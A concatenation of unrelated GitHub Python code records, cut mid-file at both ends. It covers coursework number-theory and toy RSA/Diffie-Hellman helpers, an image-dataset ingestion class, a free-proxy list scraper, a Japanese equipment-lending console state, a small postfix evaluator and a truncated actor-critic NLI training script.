ans.append(i)\n except AssertionError:\n pass\n return ans\n pass\n \n\n\nclass RSA():\n def __init__(self):\n super().__init__()\n self.p = get_large_prime()\n self.q = get_large_prime()\n self.n = self.p * self.q\n self.len = len(str(self.n))\n self.phi = (self.p-1) * (self.q-1)\n # self.bias = 132435343242330\n # self.charset = '0123456789' + 'abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + ',.?><[]*%_@{#} \\\\!/:\\n()+-=\\'\"'\n # self.index_to_char = {\n # index + self.bias :char for index,char in enumerate(self.charset)\n # }\n # self.char_to_index = {\n # char : index for index,char in self.index_to_char.items()\n # }\n \n self.e = random.randint(2,self.phi)\n while gcd(self.e,self.phi) != 1:\n self.e = random.randint(2,self.phi)\n self.d = get_inverse(self.e,self.phi)\n\n def lock(self,m):\n m = str(m)\n tmp = []\n for char in m:\n # tmp.append(self.char_to_index[char])\n tmp.append(ord(char))\n c = []\n for char in tmp:\n char = int(char)\n c_tmp = str(fast_power(char,self.e,self.n))\n c_tmp = '0'*(self.len - len(c_tmp)) + c_tmp \n c.append(c_tmp)\n return ''.join(c)\n \n def unlock(self,c,use_china_res=False):\n if not use_china_res:\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n c_char = int(c[i:i+self.len])\n c_char = fast_power(c_char,self.d,self.n)\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n 
else:\n # count = 0\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n print(f'Decoding No.{i} char...')\n c_char = int(c[i:i+self.len])\n # c_char = fast_power(c_char,self.d,self.n)\n b1 = fast_power(c_char,self.d,self.p)\n b2 = fast_power(c_char,self.d,self.q)\n c_char = china_res([b1,b2],[self.p,self.q])[0]\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n \n\nclass DH():\n def __init__(self):\n super().__init__()\n self.p = 353\n gs = get_primitive_root(self.p)\n index = random.randint(0,len(gs))\n self.g = gs[index]\n self.sk = 233\n self.pk = fast_power(self.g,self.sk,self.p)\n def change(self,pk_2):\n self.sk = fast_power(pk_2,self.sk,self.p)\n\n\ndef is_large_prime(n:int,k:int=4):\n '''\n Use Miller-Rabin method to judge whether number n is a large prime number.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n if n == 1 or (n & 1) == 0:\n return False\n if n == 2:\n return True\n t = n - 1\n s = 0\n while (t & 1) == 0:\n # t = t >> 1\n t >>= 1\n s += 1\n\n for _ in range(k):\n b = random.randint(2,n)\n while gcd(b,n) != 1:\n b = random.randint(2,n)\n # r = 0\n index = fast_power(b,t,n)\n\n # r = 0\n if index == 1 or index == (n-1):\n continue\n \n flag = False\n for r in range(1,s):\n index = (index**2) % n\n if index == 1:\n return False\n if index == (n-1):\n flag = True\n if flag:\n break\n if flag:\n continue\n else:\n return False\n return True\n\ndef get_large_prime(low:int=2**100,high:int=2**200,k:int=4):\n '''\n Use Miller-Rabin method to find a large prime number.\\n\n Please make sure the difference between low and high is sufficiently big.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n while True:\n n = random.randint(low,high)\n if is_large_prime(n,k):\n return n\n\n\ndef lian_fen_shu(x,K:int=10):\n '''\n 构造简单的连分数\\n\n x是需要计算的数字\\n\n K是迭代次数 默认是10\\n\n 返回一个元组:第1个元素是近似值,第2个元素是连分数,是一个list\\n\n '''\n tmps = []\n a = math.floor(x)\n x = x - a\n k = 0\n tmps.append(a)\n while x != 0 and k < K:\n a = math.floor(1 / x)\n x = 1/x - a\n tmps.append(a)\n k += 1\n tmps = tmps[::-1]\n ans = tmps[0]\n for index in range(1,len(tmps)):\n ans = 1/ans + tmps[index]\n # print(tmps[::-1])\n return ans,tmps[::-1]\n\n\n\nclass Fenshu():\n def __init__(self,num=1,den=1):\n '''num是分子默认为1\\nden是分母默认为1\\n'''\n super().__init__()\n self.num = int(num)\n self.den = int(den)\n \n def add(self,y):\n num = self.num * y.den + self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def sub(self,y):\n num = self.num * y.den - self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def mul(self,y):\n num = self.num * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def inv(self):\n return Fenshu(self.den,self.num)\n \n def div(self,y):\n return self.mul(y.inv())\n\n def display(self):\n return self.num,self.den\n \n def xiaoshu(self):\n return self.num / self.den\n\n def to_lianfenshu(self):\n '''转换成连分数的形式\\n如果这个分数是负数,会被转换成正数来进行操作\\n'''\n ans = []\n num = abs(self.num)\n den = abs(self.den)\n zhengshu = num // den\n xiaoshu = Fenshu(num - zhengshu * den,den)\n ans.append(zhengshu)\n while xiaoshu.num != 0:\n xiaoshu = xiaoshu.inv()\n zhengshu = xiaoshu.num // xiaoshu.den\n xiaoshu = Fenshu(xiaoshu.num - zhengshu * xiaoshu.den, xiaoshu.den)\n 
ans.append(zhengshu)\n return ans\n\n\n\ndef lianfenshu_to_float(X:list):\n '''从一个list的连分数转换成分子/分母\\n'''\n X = [Fenshu(x) for x in X]\n ans = X[-1]\n X = X[0:-1][::-1]\n for x in X:\n ans = ans.inv().add(x)\n return ans.display(),ans.xiaoshu()\n\n\n\nif __name__ == '__main__':\n # n = 2**257 - 1\n # n = 19260817\n # for p in [89,107]:\n # n = 2**p - 1\n # print(f'p = {p} , n = {n} , {is_large_prime(n)}')\n # print(gcd(12,10,6,4,6454))\n\n\n # d = DH()\n # d.change(40)\n # a = 61\n # print(get_primitive_root(a))\n # print(is_large_prime(2**67 - 1))\n # n = 2**257 - 1\n # s = 1\n # t = (n-1) // (2**s)\n # print(fast_power(3,t,n))\n\n\n # print(lian_fen_shu(math.pi,10) )\n # with open('ans.json','w',encoding='utf8') as f:\n # ts = [(20210520,113),(210520,191)]\n # ANS = {}\n # for index,t in enumerate(ts):\n # ans = {}\n # a,b = t\n # ans['a'] = a\n # ans['b'] = b\n # ans['连分数'] = lian_fen_shu(a/b,100)[1]\n # # print(lian_fen_shu(a/b,100))\n # # print(bezout(a,b))\n # ans['a的系数'],ans['b的系数'] = bezout(a,b)\n # ANS[index] = ans\n # json.dump(ANS,f,ensure_ascii=False)\n\n # r = RSA()\n # text = ''\n # with open('out.txt','r',encoding='utf8') as f:\n # text = f.read()\n # c = r.lock(text)\n # print(c)\n # with open('cipher_text.txt','w+') as f:\n # f.write(c)\n # print()\n # print(r.unlock(c,False))\n\n\n # all = 0\n # true = 0\n # for n in range(100000):\n # if is_large_prime(n):\n # all += 1\n # if is_prime(n):\n # true += 1\n # print(true / all)\n\n # a = get_large_prime()\n # print(a,get_prime_factors(a))\n pi = [3,7,15,1,293,10,3,8,2,1,3,11,1,2,1,2,1]\n ans = lianfenshu_to_float(pi)\n num = ans[0][0]\n den = ans[0][1]\n print(ans)\n print(pi)\n print(Fenshu(num,den).to_lianfenshu())\n print(Fenshu(22,7).xiaoshu())\n\n\n # a = Fenshu(1,3)\n # b = Fenshu(2,5)\n # c = a.div(b)\n # print(c.display())\n\n \n\n # ms = [5,6,7]\n # m = 1\n # for _ in ms:\n # m *= _\n # Ms = list(map(lambda x:m//x,ms))\n # for Mi,mi in zip(Ms,ms):\n # print(f'{m}/{mi}={Mi}模{mi}逆元是{get_inverse(Mi,mi)}')\n\n\n pass\n\n # for n in [191,191**2,113,113*9]:\n # for b in [2,3,5,7]:\n # print(f'n = {n} , b = {b} , mod = {fast_power(b,n-1,n)}')\n\n# a = [3,1,1,2,3,1,1]\n# a = a[::-1]\n# ans = a[0]\n# for i in range(1,len(a)):\n# ans = 1/ans + a[i]\n# print(ans - 7700/2145)\n\n\n# a = 1\n# for i in range(10000):\n# a = 1/a + 1\n# print(a - (5**0.5+1)/2)","repo_name":"zerzerzerz/xinanshuji","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":26851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24042276584","text":"from FarmInsectsClassifier.entity.config_entity import DataIngestionConfig\nfrom FarmInsectsClassifier.logger import logging\nfrom FarmInsectsClassifier.exception import DataIngestionError\n\nfrom pathlib import Path\nfrom zipfile import ZipFile\nimport splitfolders\n\nclass DataIngestion:\n def __init__(self, data_path: Path, config: DataIngestionConfig):\n self.data_path = data_path\n self.config = config\n\n def unzip(self) -> None:\n \n unzip_path = self.config.unzip_dir\n unzip_path.mkdir(exist_ok=True, parents=True)\n\n logging.info(\"Extracting zip file\")\n\n with ZipFile(self.data_path, \"r\") as zip_ref:\n zip_ref.extractall(unzip_path)\n\n logging.info(\"Zipfile extraction completed\")\n\n \n\n\n def split_data(self) -> None:\n \n path = list(self.config.unzip_dir.resolve().iterdir())[0]\n output = self.config.unzip_dir / \"farm-insects-splitted\"\n\n logging.info(\"Splitting folder into train, test and validation 
set\")\n\n splitfolders.ratio(path, seed=1, output=str(output), ratio=(0.6, 0.2, 0.2))\n\n logging.info(\"Train, test and validation data successfully created\")\n\n \n","repo_name":"yickysan/Farm-Insects-Classification","sub_path":"src/FarmInsectsClassifier/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40864339359","text":"from collections import namedtuple, defaultdict\nimport requests\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport shelve\nimport warnings\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .config import CACHE_PATH\nfrom .exceptions import PageServerDown\n\n\nclass Proxy:\n\n\t__slots__ = ('ip', 'port', 'type', 'anonymous', 'speed', 'time_since_last_check')\n\n\tdef __init__(self, ip, port, type, anonymous, speed, time_since_last_check):\n\t\tself.ip = ip\n\t\tself.port = port\n\t\tself.type = type\n\t\tself.anonymous = anonymous\n\t\tself.speed = speed\n\t\tself.time_since_last_check = time_since_last_check\n\n\tdef to_string(self):\n\t\treturn '{}:{}'.format(self.ip, self.port)\n\n\t__repr__ = __str__ = to_string\n\n\tdef __eq__(self, other):\n\t\treturn self.to_string() == other.to_string()\n\n\tdef __hash__(self):\n\t\treturn hash(self.to_string())\n\n\ndef parse_page(url):\n\t\"\"\" Parse a single html page on https://www.xicidaili.com to get a list of proxies \"\"\"\n\tnow = datetime.today()\n\n\theaders = headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\tpage = requests.get(url, headers=headers)\n\tif page.status_code != 200:\n\t\twarnings.warn('{} could not be connected at the moment'.format(url))\n\t\t# raise PageServerDown('{} could not connect'.format(url))\n\tsoup = BeautifulSoup(page.text, 'lxml')\n\n\tproxies = list()\n\tfor row in soup.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 10:\n\t\t\tspeed = cols[6].find(class_='bar_inner').attrs['style'] # width:99%\n\t\t\tspeed = float(''.join(filter(lambda x: x.isdigit(), speed)))\n\n\t\t\tlast_check_time = datetime.strptime(cols[-1].text.strip(), '%y-%m-%d %H:%M')\n\t\t\ttime_since_last_check = (now - last_check_time).seconds\n\n\t\t\tp = Proxy(ip=cols[1].text, \n\t\t\t\t\tport=cols[2].text, \n\t\t\t\t\ttype=cols[5].text, \n\t\t\t\t\tanonymous=(cols[4].text=='高匿'), \n\t\t\t\t\tspeed=speed,\n\t\t\t\t\ttime_since_last_check=time_since_last_check)\n\t\t\tproxies.append(p)\n\treturn proxies\n\n\ndef get_proxies(use_cache=False, save=True):\n\t# TODO: http://www.kuaidaili.com/free/inha/\n\n\tif use_cache:\n\t\t# set flag to 'r' to support concurrent reads\n\t\twith shelve.open(CACHE_PATH, flag='r') as f:\n\t\t\tproxies = {k: v for k, v in f.items()}\n\t\t\treturn proxies\n\n\tXICI = 'https://www.xicidaili.com/{}/{}'\n\n\tproxies = defaultdict(list)\n\t# get the first 10 pages\n\t# for url in [XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))]:\n\t# \tfor proxy in parse_page(url):\n\t# \t\tproxies[proxy.type].append(proxy)\n\n\twith ThreadPoolExecutor(max_workers=20) as ex:\n\t\tresults = ex.map(parse_page, \n\t\t\t[XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))])\n\n\tfor result in results:\n\t\tfor proxy in result:\n\t\t\tproxies[proxy.type].append(proxy)\n\n\tif save:\n\t\t# TODO: adding thread locks here\n\t\twith 
shelve.open(CACHE_PATH, writeback=True) as f:\n\t\t\tfor k, v in proxies.items():\n\t\t\t\tf[k] = v\n\t\tprint('Saved to {}'.format(CACHE_PATH))\n\treturn proxies\n","repo_name":"MaxwellLZH/random-proxy","sub_path":"randomproxy/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42605224065","text":"#!/usr/bin/env python\nfrom db.EquipmentRecord import EquipmentRecord\nfrom db.AccountRecord import AccountRecord\nimport state as state\nimport dev.display.Console as Console\nfrom state.commonResource import CommonResource as cmn_res\nfrom db.UserProcedure import UserProcedure\nfrom dev.input import input\n\nclass ConfirmToUpdateProcedure(state.IState):\n    def entry(self):\n        self.__input = input.SunitizedString(\n            input.ConsoleTextField()\n        )\n        self.__get_next_state = state.ErrorHasOccurred()\n\n        Console.clear()\n        Console.puts(\"以下の内容で手続きを行います。よろしいですか?(Y/N)\")\n        Console.puts(\"ユーザID :\", cmn_res.user.data[AccountRecord.EMPLOYEE_ID])\n        Console.puts(\"機材ID :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID])\n        Console.puts(\"機材名 :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_NAME])\n        Console.puts(\"返却予定日:\", cmn_res.equipment.data[EquipmentRecord.END_DATE])\n        Console.puts(\">\", end=\"\")\n\n    def do(self):\n        self.__input.capture()\n\n    def exit(self):\n        if self.__input.get_string() in [\"y\", \"Y\"]:\n            result = UserProcedure(True).update_equipment_return_date(\n                cmn_res.user.data[AccountRecord.EMPLOYEE_ID],\n                cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID],\n                cmn_res.equipment.data[EquipmentRecord.END_DATE])\n            if result:\n                self.__get_next_state = state.SuccessUpdateEquipment()\n            else:\n                Console.puts(\"更新の受理に失敗しました。\")\n                Console.puts(\"再度試しても失敗する場合、システム管理者に問い合わせてください。\", \"\\n\")\n                self.__get_next_state = state.ErrorHasOccurred()\n        else:\n            Console.puts(\"更新手続きをキャンセルしました。\")\n            self.__get_next_state = state.GotoNextAfterWaiting()\n            self.__get_next_state.set_next_state(state.StandbyUpdateEquipmentIdInput())\n\n    def get_next_state(self):\n        return self.__get_next_state\n\n    def should_exit(self):\n        return self.__input.submitted()\n","repo_name":"soudai-aisw/aisw_bihin","sub_path":"src/state/ConfirmToUpdateProcedure.py","file_name":"ConfirmToUpdateProcedure.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29996906137","text":"\ndef post_fix(expr):\n    pieces = expr.split()\n    nums = [p for p in pieces if p.isnumeric()]\n    ops = [p for p in pieces if not p.isnumeric()]\n\n    curr = nums[0]\n\n    for num,op in zip(nums[1:],ops):\n        curr = str(int(eval(curr+op+num)))\n\n    return int(curr)\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kZSi2XWDpu83miexy_1.py","file_name":"kZSi2XWDpu83miexy_1.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41255664595","text":"import os\nimport sys\nimport time\nimport argparse\nfrom collections import Counter\nimport numpy as np\nimport random\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom data import get_nli, get_batch, build_vocab\nfrom mutils import get_optimizer\nfrom models import critic, actor\nfrom read_data import get_SICK_data\nprint(\"sick: model_actor_avg0.25_17\")\nparser =
argparse.ArgumentParser(description='NLI training')\n\nsamplecnt = 1\nepsilon = 0.05\nalpha = 0.1\nverbose = 1\nif verbose:\n f = open(\"results.txt\", \"w\")\n f.close()\n\nbothCritic = \"both_critic0.25abs_nodelay.pickle-ds\"\nbothActor = \"both_actor0.25abs_nodelay.pickle-ds\"\n\n\n# paths\nparser.add_argument(\"--nlipath\", type=str, default='dataset/SNLI/', help=\"NLI data path (SNLI or MultiNLI)\")\nparser.add_argument(\"--outputdir\", type=str, default='savedir/SOUVIK/', help=\"Output directory\")\nparser.add_argument(\"--criticmodelname\", type=str, default='model_best_souvik.pickle')\nparser.add_argument(\"--actormodelname\", type=str, default='model_actor_avg0.25.pickle')\nparser.add_argument(\"--word_emb_path\", type=str, default=\"dataset/glove.840B.300d.txt\", help=\"word embedding file path\")\n\n# training\nparser.add_argument(\"--n_epochs\", type=int, default=1)\nparser.add_argument(\"--batch_size\", type=int, default=5)\nparser.add_argument(\"--dpout_model\", type=float, default=0., help=\"encoder dropout\")\nparser.add_argument(\"--dpout_fc\", type=float, default=0., help=\"classifier dropout\")\nparser.add_argument(\"--nonlinear_fc\", type=float, default=1, help=\"use nonlinearity in fc\")\nparser.add_argument(\"--optimizer\", type=str, default=\"sgd,lr=0.01\", help=\"adam or sgd,lr=0.1\")\nparser.add_argument(\"--lrshrink\", type=float, default=1, help=\"shrink factor for sgd\")\nparser.add_argument(\"--decay\", type=float, default=0.99, help=\"lr decay\")\nparser.add_argument(\"--minlr\", type=float, default=1e-5, help=\"minimum lr\")\nparser.add_argument(\"--max_norm\", type=float, default=5., help=\"max norm (grad clipping)\")\n\n# model\nparser.add_argument(\"--encoder_type\", type=str, default='InferSent', help=\"see list of encoders\")\nparser.add_argument(\"--enc_lstm_dim\", type=int, default=1024, help=\"encoder nhid dimension\")\nparser.add_argument(\"--n_enc_layers\", type=int, default=1, help=\"encoder num layers\")\nparser.add_argument(\"--fc_dim\", type=int, default=512, help=\"nhid of fc layers\")\nparser.add_argument(\"--n_classes\", type=int, default=3, help=\"entailment/neutral/contradiction\")\nparser.add_argument(\"--pool_type\", type=str, default='max', help=\"max or mean\")\n\n# gpu\nparser.add_argument(\"--gpu_id\", type=int, default=0, help=\"GPU ID\")\nparser.add_argument(\"--seed\", type=int, default=1234, help=\"seed\")\n\n# data\nparser.add_argument(\"--word_emb_dim\", type=int, default=300, help=\"word embedding dimension\")\n\nparams, _ = parser.parse_known_args()\n\n# set gpu device\ntorch.cuda.set_device(params.gpu_id)\n\n# print parameters passed, and all parameters\nprint('\\ntogrep : {0}\\n'.format(sys.argv[1:]))\nprint(params)\n\nnp.random.seed(params.seed)\ntorch.manual_seed(params.seed)\ntorch.cuda.manual_seed(params.seed)\n\n\"\"\"\nDATA\n\"\"\"\n#train, valid, test = get_nli(params.nlipath)\n\ntrain, valid, test = get_SICK_data()\n\nword_vec = build_vocab(train['s1'] + train['s2'] +\n valid['s1'] + valid['s2'] +\n test['s1'] + test['s2'], params.word_emb_path)\n\n\nfor split in ['s1', 's2']:\n for data_type in ['train', 'valid', 'test']:\n eval(data_type)[split] = np.array([[word for word in sent.split() if word in word_vec] for sent in eval(data_type)[split]])\n\n\n\n\"\"\"\nMODEL\n\"\"\"\n# model config\nconfig_nli_model = {\n 'n_words' : len(word_vec) ,\n 'word_emb_dim' : params.word_emb_dim ,\n 'enc_lstm_dim' : params.enc_lstm_dim ,\n 'n_enc_layers' : params.n_enc_layers ,\n 'dpout_model' : params.dpout_model ,\n 'dpout_fc' : 
params.dpout_fc ,\n 'fc_dim' : params.fc_dim ,\n 'bsize' : params.batch_size ,\n 'n_classes' : params.n_classes ,\n 'pool_type' : params.pool_type ,\n 'nonlinear_fc' : params.nonlinear_fc ,\n 'encoder_type' : params.encoder_type ,\n 'use_cuda' : True ,\n\n}\n\n# model\nencoder_types = ['InferSent', 'BLSTMprojEncoder', 'BGRUlastEncoder',\n 'InnerAttentionMILAEncoder', 'InnerAttentionYANGEncoder',\n 'InnerAttentionNAACLEncoder', 'ConvNetEncoder', 'LSTMEncoder']\nassert params.encoder_type in encoder_types, \"encoder_type must be in \" + \\\n str(encoder_types)\nnli_net = critic(config_nli_model)\nactorModel = actor(params.enc_lstm_dim, params.word_emb_dim)\nprint(nli_net)\nprint(actorModel)\n\n\nfor name, x in nli_net.named_parameters():\n print(name)\n\nfor name, x in actorModel.named_parameters():\n print(name)\n\n#print(nli_net.target_pred.enc_lstm.weight_ih_l0)\n#print(nli_net.target_classifier[4].bias)\n\n# loss\nweight = torch.FloatTensor(params.n_classes).fill_(1)\nloss_fn = nn.CrossEntropyLoss(weight=weight)\nloss_fn.size_average = False\n\n\n# optimizer\noptim_fn, optim_params = get_optimizer(params.optimizer)\ncritic_target_optimizer = optim_fn(list(nli_net.target_pred.parameters()) + list(nli_net.target_classifier.parameters()), **optim_params)\n\noptim_fn2, optim_params2 = get_optimizer(params.optimizer)\ncritic_active_optimizer = optim_fn(list(nli_net.active_pred.parameters()) + list(nli_net.active_classifier.parameters()), **optim_params2)\n\n\noptim_fn3, optim_params3 = get_optimizer(\"adam,lr=0.1\")\nactor_target_optimizer = optim_fn3(actorModel.target_policy.parameters(), **optim_params3)\n\noptim_fn4, optim_params4 = get_optimizer(\"adam,lr=0.1\")\nactor_active_optimizer = optim_fn4(actorModel.active_policy.parameters(), **optim_params4)\n\n# cuda by default\nnli_net.cuda()\nactorModel.cuda()\nloss_fn.cuda()\n\n\ndef Sampling_RL(current, summary, length, epsilon, Random = True):\n current_lower_state = torch.zeros(1, 2*params.enc_lstm_dim).cuda()\n current = current.squeeze(0)\n actions = []\n states = []\n for pos in range(0, length):\n predicted = actorModel.get_target_output(current_lower_state, current[pos], summary, scope = \"target\")\n states.append([current_lower_state, current[pos], summary])\n if Random:\n if random.random() > epsilon:\n action = (0 if random.random() < float(predicted[0].item()) else 1)\n else:\n action = (1 if random.random() < float(predicted[0].item()) else 0)\n else:\n action = int(torch.argmax(predicted))\n actions.append(action)\n if action == 1:\n out_d, current_lower_state = nli_net.forward_lstm(current_lower_state, current[pos], scope = \"target\")\n\n Rinput = []\n for (i, a) in enumerate(actions):\n if a == 1:\n Rinput.append(current[i])\n Rlength = len(Rinput)\n \n if Rlength == 0:\n actions[length-2] = 1\n Rinput.append(current[length-2])\n Rlength = 1\n \n Rinput = torch.stack(Rinput)\n return actions, states, Rinput, Rlength\n \n\n\"\"\"\nTRAIN\n\"\"\"\nval_acc_best = -1e10\nadam_stop = False\nstop_training = False\nlr = optim_params2['lr'] if 'sgd' in params.optimizer else None\n\n\ndef trainepoch(epoch, RL_train = True, LSTM_train = True):\n print('\\nTRAINING : Epoch ' + str(epoch))\n \n actorModel.train(False)\n nli_net.train(False)\n if RL_train:\n print(\"Actor Training\")\n print('Learning rate : {0}'.format(actor_active_optimizer.param_groups[0]['lr']))\n actorModel.train()\n if LSTM_train:\n print(\"InferSent Training\")\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] * 
params.decay if epoch>1\\\n and 'sgd' in params.optimizer else critic_active_optimizer.param_groups[0]['lr']\n print('Learning rate : {0}'.format(critic_active_optimizer.param_groups[0]['lr']))\n nli_net.train()\n \n all_costs = []\n logs = []\n words_count = 0\n\n last_time = time.time()\n correct = 0.\n # shuffle the data\n permutation = np.random.permutation(len(train['s1']))\n\n s1 = train['s1'][permutation]\n s2 = train['s2'][permutation]\n target = train['label'][permutation]\n\n\n for stidx in tqdm(range(0, len(s1), params.batch_size)):\n \n s1_batch, s1_len = get_batch(s1[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[stidx:stidx + s1_batch.size(1)])).cuda()\n k = s1_batch.size(1) # actual batch size\n predict = torch.zeros(s1_batch.size(1), params.n_classes).cuda()\n avgloss = 0.\n totloss = 0.\n nli_net.assign_active_network()\n actorModel.assign_active_network()\n #print(\"Target Weight: \", actorModel.target_policy.W1.weight.data, \"\\n\\n\")\n for kk in range(s1_batch.size(1)):\n left = s1_batch.transpose(0,1)[kk].view(-1, 1, 300)\n right = s2_batch.transpose(0,1)[kk].view(-1, 1, 300)\n left_len = np.array([s1_len[kk]])\n right_len = np.array([s2_len[kk]])\n tgt = tgt_batch[kk].view(-1)\n if RL_train:\n leftSummary = nli_net.summary((left, left_len))[-1]\n rightSummary = nli_net.summary((right, right_len))[-1]\n actionlist_left, actionlist_right, statelist_left, statelist_right, losslist = [], [], [], [], []\n aveloss = 0.\n for i in range(samplecnt):\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=True)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=True)\n actionlist_left.append(actions_left)\n statelist_left.append(states_left)\n actionlist_right.append(actions_right)\n statelist_right.append(states_right)\n out = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n loss_ = loss_fn(out, tgt)\n lossL = (((float(Rlength_left) / int(left.size(1))) + (int(left.size(1)) / float(Rlength_left)) * 0.25) - 1.0)\n lossR = (((float(Rlength_right) / int(right.size(1))) + (int(right.size(1)) / float(Rlength_right)) * 0.25) - 1.0)\n loss_ = loss_ + ((lossL + lossR)/2) * 0.1 * params.n_classes\n aveloss += loss_\n losslist.append(loss_)\n aveloss /= samplecnt\n totloss += aveloss\n grad1 = None\n grad2 = None\n grad3 = None\n grad4 = None\n flag = 0 \n if LSTM_train:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += 
p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n actor_target_optimizer.zero_grad()\n for i in range(samplecnt): #5\n for pos in range(len(actionlist_left[i])): #19 --> 13\n rr = [0, 0]\n rr[actionlist_left[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_left[i][pos][0], statelist_left[i][pos][1], statelist_left[i][pos][2], rr, scope = \"target\")\n if flag == 0:\n grad1 = g[0]\n grad2 = g[1]\n grad3 = g[2]\n grad4 = g[3]\n flag = 1\n else:\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n for pos in range(len(actionlist_right[i])): # 25 --> 5\n rr = [0, 0]\n rr[actionlist_right[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_right[i][pos][0], statelist_right[i][pos][1], statelist_right[i][pos][2], rr, scope = \"target\")\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n actor_active_optimizer.zero_grad()\n actorModel.assign_active_network_gradients(grad1, grad2, grad3, grad4)\n \n actor_active_optimizer.step()\n #output = nli_net((left, left_len), (right, right_len), \"target\")\n _, _, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n _, _, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n else:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n output = nli_net((left, left_len), (right, right_len), \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr 